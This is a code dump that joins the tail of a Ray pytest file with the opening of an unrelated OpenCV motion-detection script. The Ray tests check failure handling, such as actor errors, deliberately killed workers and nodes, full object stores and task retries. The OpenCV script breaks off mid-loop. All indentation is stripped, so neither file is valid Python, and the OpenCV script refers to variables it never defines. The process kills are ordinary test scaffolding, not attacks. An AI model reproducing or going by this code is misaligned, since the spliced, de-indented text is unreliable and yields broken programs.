in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this waiting, there seems to be race condition happening
# in the CI. This is not a fundamental fix for that, but it at least
# makes the test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_system_config": {
"object_store_full_max_retries": 0
}
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"object_store_full_max_retries": 0})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = {
"free_objects_batch_size": 1,
}
ray.init(
num_cpus=2,
object_store_memory=10**8,
_lru_evict=True,
_system_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"task_retry_delay_ms": 500
}
}],
indirect=True)
def test_async_actor_task_retries(ray_start_regular):
# https://github.com/ray-project/ray/issues/11683
signal = SignalActor.remote()
@ray.remote
class DyingActor:
def __init__(self):
print("DyingActor init called")
self.should_exit = False
def set_should_exit(self):
print("DyingActor.set_should_exit called")
self.should_exit = True
async def get(self, x, wait=False):
print(f"DyingActor.get called with x={x}, wait={wait}")
if self.should_exit:
os._exit(0)
if wait:
await signal.wait.remote()
return x
# Normal in order actor task retries should work
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
assert ray.get(dying.get.remote(1)) == 1
ray.get(dying.set_should_exit.remote())
assert ray.get(dying.get.remote(42)) == 42
# Now let's try out of order retries:
# Task seqno 0 will return
# Task seqno 1 will be pending and retried later
# Task seqno 2 will return
# Task seqno 3 will crash the actor and retried later
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
# seqno 0
ref_0 = dying.get.remote(0)
assert ray.get(ref_0) == 0
# seqno 1
ref_1 = dying.get.remote(1, wait=True)
# seqno 2
ref_2 = dying.set_should_exit.remote()
assert ray.get(ref_2) is None
# seqno 3, this will crash the actor because previous task set should exit
# to true.
ref_3 = dying.get.remote(3)
# At this point the actor should be restarted. The two pending tasks
# [ref_1, ref_3] should be retried, but not the completed tasks [ref_0,
# ref_2]. Critically, if ref_2 was retried, ref_3 can never return.
ray.get(signal.send.remote())
assert ray.get(ref_1) == 1
assert ray.get(ref_3) == 3
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
Hybrid_m_circles.py
|
import cv2
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import threading
def main():
cap = cv2.VideoCapture(vid_path)
status1, previous_frame = cap.read()
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
copy_frame = cv2.cvtColor(previous_frame, cv2.COLOR_BGR2GRAY)
fgbg = cv2.createBackgroundSubtractorMOG2()
hsv = np.zeros_like(previous_frame)
hsv[...,1] = 255
t = 20
dc = 6
red = 30
check_red = 1
start = 0
radiuce_up_limit =60
radiuce_low_limit = 30
i = 0
while(i < total_frames - 1):
ret, frame = cap.read()
i = i + 1
frame1 = frame.copy()
current_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
current_frame = cv2.GaussianBlur(current_frame, (var_blur,var_blur), 0)
# frame differening
frame_diff = cv2.absdiff(current_frame,copy_frame)
ret ,binary_image1 = cv2.threshold(frame_diff,3,255,cv2.THRESH_BINARY)
# optical Flow
flow = cv2.calcOpticalFlowFarneback(copy_frame,current_frame, None, 0.5, 3, 15, 3, 5, 1.2, 0)
mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])
hsv[...,0] = ang*180/np.pi/2
hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)
bgr = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)
grayscaled = cv2.cvtColor(bgr,cv2.COLOR_BGR2GRAY)
retval2 , binary_image2 = cv2.threshold(grayscaled,125,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# Background Subtraction
binary_image3 = fgbg.apply(current_frame)
# combination of three methods
final_binary = cv2.bitwise_and(binary_image2,binary_image3,binary_image1)
lab_val = 255
n_labels, img_labeled, lab_stats, _ = \
cv2.connectedComponentsWithStats(final_binary, connectivity=8,
ltype=cv2.CV_32S)
if check_red == 1:
red = red +10
if red > radiuce_up_limit:
check_red =0
else:
red = red -10
if red == radiuce_low_limit:
check_red =1
if lab_stats[1:, 4].size > 2:
start = 1
dc = dc +1
if dc > 6:
dc = 0
re = lab_stats[1:, 4].argsort()[-3:][::-1] + 1
largest_mask = np.zeros(final_binary.shape, dtype=np.uint8)
largest_mask[img_labeled == re[0]] = lab_val
cnts1 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts1 = cnts1[0] if imutils.is_cv2() else cnts1[1]
largest_mask[img_labeled == re[1]] = lab_val
cnts2 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts2 = cnts2[0] if imutils.is_cv2() else cnts2[1]
